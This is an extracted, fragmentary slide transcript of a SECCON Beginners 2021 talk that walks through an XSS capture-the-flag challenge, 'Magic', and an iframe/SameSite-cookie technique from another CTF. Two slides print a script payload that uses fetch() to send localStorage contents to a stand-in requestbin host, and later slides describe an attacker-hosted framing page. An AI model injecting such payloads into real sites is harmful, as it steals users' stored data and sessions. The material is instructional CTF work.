Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

Transcript

1. Magic Web SECCON Beginners Live 2021 hi120ki

2. @hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :

   firmware Web : json, magic

3. Web Magic 3

4. Magic [Web Hard] : 31solve Web 5 • • 4

5. 5 /

6. 6 /

7. 7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

8. 8 / URL

9. 9 /

10. 10 crawler/index.js puppeteer Node.js Chrome URL

11. 11 2. FLAG 3. URL crawler/index.js 1.

12. 12 FLAG nginx/html/static/index.js FLAG

13. 13 FLAG JavaScript XSS( )

14. XSS 14 HTML Web HTML JavaScript Cookie Web

15. 15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG

16. 16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>

17. 17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????

18. 18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL

19. XSS 19 magic/views/index.ejs <script> </script>

20. 20 alert(1)

21. 21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>

22. 22 FLAG URL

23. 23 XSS https://magic.quals.beginners.seccon.jp/

24. 24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS

25. 25 ... + = ? XSS

26. 26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG

27. 27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

28. 28 URL

29. 29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS

30. 30 FLAG 1. FLAG 2. 3.

31. 31

32. 1. XSS 2. 3. 32

33. 1. XSS 2. 3. 33 FLAG

34. 1. XSS 2. 3. 34

35. 1. XSS 2. 3. 35

36. 36 FLAG

37. XSS • • Byte Bandits CTF 2020 Notes App •

    https://github.com/ByteBandits/bbctf-2020 37

38. Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •

    FLAG iframe • • API

39. iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL

    iframe

40. iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe

41. iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS

    FLAG

42. iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)

    <script>...</script>

43. 43 iframe SameSite Cookie None Lax

44. 44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)

    FLAG

45. 45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)

    FLAG

46. SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie

    (session=nj49gn...) ✕ FLAG <script>...</script>

47. 47 SameSite Cookie=None iframe CTF

48. 48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (

    XSS Content-Security-Policy )

49. 49 FLAG +

50. 50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup

    https://hi120ki.github.io/blog/posts/20210523-3/